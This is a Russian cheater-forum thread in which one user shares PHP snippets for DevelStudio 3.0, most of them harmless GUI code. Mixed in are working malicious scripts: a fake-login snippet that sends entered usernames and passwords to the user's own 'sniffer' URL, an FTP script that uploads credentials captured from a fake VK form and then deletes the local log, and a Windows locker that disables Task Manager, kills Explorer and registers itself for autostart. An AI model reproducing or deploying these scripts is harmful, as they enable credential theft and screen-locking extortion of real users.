скрипты для DevelStudio 3.0 beta

Тема в разделе "Полезные Программы для Читера", создана пользователем froggi533, 10 сен 2013.

Статус темы:
Закрыта.
  1. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    Скрипт на кнопку цифры:
    c("edit1")->text .="ваша цифра";

    Скрипт на таймер:
    c("progress1")->position +=1;
    $time=c("progress1")->position;
    c("labTime")->caption =$time;
    if($time==50)
    {
    c("timer1")->enable = false;
    c("image1")->enabled = false;
    MessageBox("Ваш результат: ".c("labCou")->caption, "Сообщение!");
    c("button1")->enabled = true;
    }

    Скрипт на картинку:
    $l= rand(0,c("panel1")->w-c("image1")->w);
    $t= rand(0,c("panel1")->h-c("image1")->h);
    c("image1")->x =$l;
    c("image1")->y =$t;
    c("labCou")->caption +=1 ;

    Скрипт на кнопку старт:
    c("timer1")->enable = true;
    c("timer1")->repeat = true;
    c("button1")->enabled = false;
    c("image1")->enabled = true;

    c("labCou")->caption = 0;
    c("labTime")->caption = 0;
    c("progress1")->position=0;

    Скрипт для кражи логина и пароля на сниффер:
    $edit1 = c('Form1->edit1')->text;
    $edit2 = c('Form1->edit2')->text;
    $combobox1 = c('Form1->combobox1')->inText;
    $url = "ССЫЛКА НА ВАШ СНИФФЕР";
    file_get_contents($url . "?" . "Логин:" . $edit1 . "|Пароль:" . $edit2);
    MessageBox("Неверно введён логин или пароль", "Ошибка");

    Скрипт на кнопку "Разблокировать":
    if(c("edit1")->text =="1337"){ (ПАРОЛЬ ДЛЯ РАЗБЛОКИРОВКИ)
    Run("explorer.exe", false); (ЗАПУСКАЕТ ПРОВОДНИК)
    DisableTaskMng(false); (ВКЛЮЧАЕТ ДИСПЕДЧЕР ЗАДАЧ)
    app::close(); (ЗАКРЫВАЕТ ПРОГРАММУ)
    }
    else{
    c("edit1")->text = "Неверный код!" ;
    c("label3")->text -= "1";
    }

    Скрипт для блокировки Windows:
    DisableTaskMng(true); (ВЫРУБАЕТ ДИСПЕДЧЕР ЗАДАЧ)
    shell_exec("TASKKILL /F /IM explorer.exe"); (УБИВАЕТ ПРОВОДНИК)
    $w = $SCREEN->width;
    $h = $SCREEN->height;
    $project = 'InjectorBySolex.exe'; (НАЗВАНИЕ ПРОГРАММЫ)
    $str = strtr($dir , '/', '\\');
    writeRegKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", "$str$project", STRING); (ЗАПИСЬ В РЕЕСТР - АВТОЗАГРУЗКА)

    Скрипт на кнопку "Очистить":
    c("edit1")->text = "" ;

    Таймер обратного отсчета:
    $q = c("label1")->caption;
    c("label1")->caption = $q - 1;
    $w = c("label1")->caption;
    if($w == 0){
    $min = c("label2")->caption;
    c("label2")->caption = $min - 1;
    $mint = c("label2")->caption;
    c("label1")->caption = 60;
    }
    if($mint == 0){
    if($w == 0){
    c("button1")->enabled = true;
    c("timer1")->enable = false;
    }
    }
    $minut = c("label2")->caption;
    c("label3")->caption = $minut." Мин ". $w ." Сек";

    Скрипт для акцивации:
    if(c("edit1")->text =="код активации"){
    HideForm(Form1, SW_SHOW);
    LoadForm(ziabyka, SW_SHOW);
    }
    else{
    MessageBox("Неверный код активации", "Error");
    }


    Скрипт для плеера:
    Сайт иконок -

    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме


    $result = c("openDlg1")->execute(); (ОТКРЫТЬ)
    if ($result)
    {
    $arr = c("openDlg1")->files;
    foreach ($arr as $i=>$file)
    $arr[$i] = basename($file);
    c("listBox1")->items->setArray($arr);
    $music = c("listBox1")->items->selected; (ИГРАТЬ)
    c("sqPlayer1")->fileName = $music;
    c("sqPlayer1")->play();
    WinShutdown();

    Как записать текст в файл:
    file_put_contents("<путь к файлу>", "<текст>");

    Как получить содержимое файла:
    $text = file_get_contents("<путь к файлу>");
    Пример:
    $text = file_get_contents("C:/FileName.txt"); print($text);

    Скрипт отправки данных FTP:
    PHP highlight
    $ftp_server = (""); (СЕРВЕР FTP)
    $ftp_login = (""); (ЛОГИН FTP)
    $ftp_pass = (""); (ПАРОЛЬ FTP)
    $file = ('logs.txt'); (ИМЯ ФАЙЛА С ЛОГАМИ)
    $vk_login = c("edit1")->text; (ЛОГИН С ФЕЙКА)
    $vk_pass = c("edit2")->text; (ПАРОЛЬ С ФЕЙКА)
    $open = ftp_connect($ftp_server, 21, 30); (ПОДКЛЮЧЕНИЕ К FTP СЕРВЕРУ)
    ftp_connect($ftp_server, 21, 30); (ПОДКЛЮЧАЕМСЯ)
    ftp_login($open, $ftp_login, $ftp_pass); (АВТОРИЗУЕМСЯ)
    ftp_get($open, $file, $file, FTP_BINARY); (СКАЧИВАЕМ ФАЙЛ С ЛОГАМИ)
    $log = fopen($file,"a+"); (ОТКРЫВАЕМ СКАЧАНЫЙ ФАЙЛ)
    fwrite($log,"$vk_login;$vk_pass \n"); (ЗАПИСЫВАЕМ ДАННЫЕ)
    fclose($log); (ЗАКРЫВАЕМ ФАЙЛ)
    ftp_pasv($open, true); (ПЕРЕКЛЮЧАЕМСЯ В ПАССИВНЫЙ РЕЖИМ)
    !ftp_put($open, $file, $file, FTP_BINARY); (ОТПРАВЛЯЕМ ФАЙЛ НА FTP)
    ftp_close($open); (ЗАКРЫВАЕМ СОЕДИНЕНИЕ)
    file_delete("$file"); (УДАЛЯЕМ ФАЙЛ С ЛОГАМИ ИЗ КОМПЬЮТЕРА)
    Создаем в корне FTP файл logs.txt с правами 777

    Запретить закрытие программы:
    $canclose=false

    Прогресс бар двигается при нажатии на кнопку:
    На кнопку:
    ShowForm(progress1, SW_SHOW);
    C("TIMER1")->ENABLE = TRUE;
    C("TIMER1")->REPEAT = TRUE;
    C("BUTTON1")->ENABLED = FALSE;
    C("PROGRESS1")->POSITION=0;
    на таймер:
    c("progress1")->position +=1;
    $time = c("progress1")->position;
    if($time==3000){ c("timer1")->enable = false;
    c("button1")->enabled = true;
    }h>d Кому помог сяпку)
     
  2.  
  3. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    кому нужно могу еще):cool:
     
    читер05 нравится это.
  4. Оффлайн

    Aventador™

    На форуме с:
    25 дек 2012
    Сообщения:
    605
    Симпатии:
    755
    Баллы:
    148
    Пол:
    Мужской
    skype:
    mr.teldes-aim350
  5. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    ты не знаешь?
     
    читер05 нравится это.
  6. Оффлайн

    Maksim Frolof сержант

    На форуме с:
    8 авг 2013
    Сообщения:
    35
    Симпатии:
    3
    Баллы:
    6
    Помоги сделал прогу для узнания ip а там одни вирусы (ну всемысле через вирус тотал) что итам токого вирусного вот скрипт
    $ip = $_SERVER['REMOTE_ADDR'];
    c("edit1")->text = "$ip";
     
    читер05 нравится это.
  7. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    ничего здесь вирусного быть не может
     
    читер05 нравится это.
  8. Оффлайн

    Maksim Frolof сержант

    На форуме с:
    8 авг 2013
    Сообщения:
    35
    Симпатии:
    3
    Баллы:
    6
    А чё вирус тотал просто ужасный:(+
     
    читер05 нравится это.
  9. Оффлайн

    sgush321 М. Лейтенант

    На форуме с:
    7 дек 2013
    Сообщения:
    439
    Симпатии:
    171
    Баллы:
    71
    Пол:
    Мужской
    Пасибо помог немого интересовал скрипт на плеер если есть ещё скрипты кидай в Лс
     
    читер05 нравится это.
  10. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    ок)
     
  11. Оффлайн

    ƊƩϻṎⱧ рядовой

    На форуме с:
    9 апр 2014
    Сообщения:
    2
    Симпатии:
    0
    Баллы:
    1
    Привет, помогите!
    Какой нужен скрипт и куда его вставить?
     
Статус темы:
Закрыта.

Поделиться этой страницей

  1. develstudio writeregkey

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!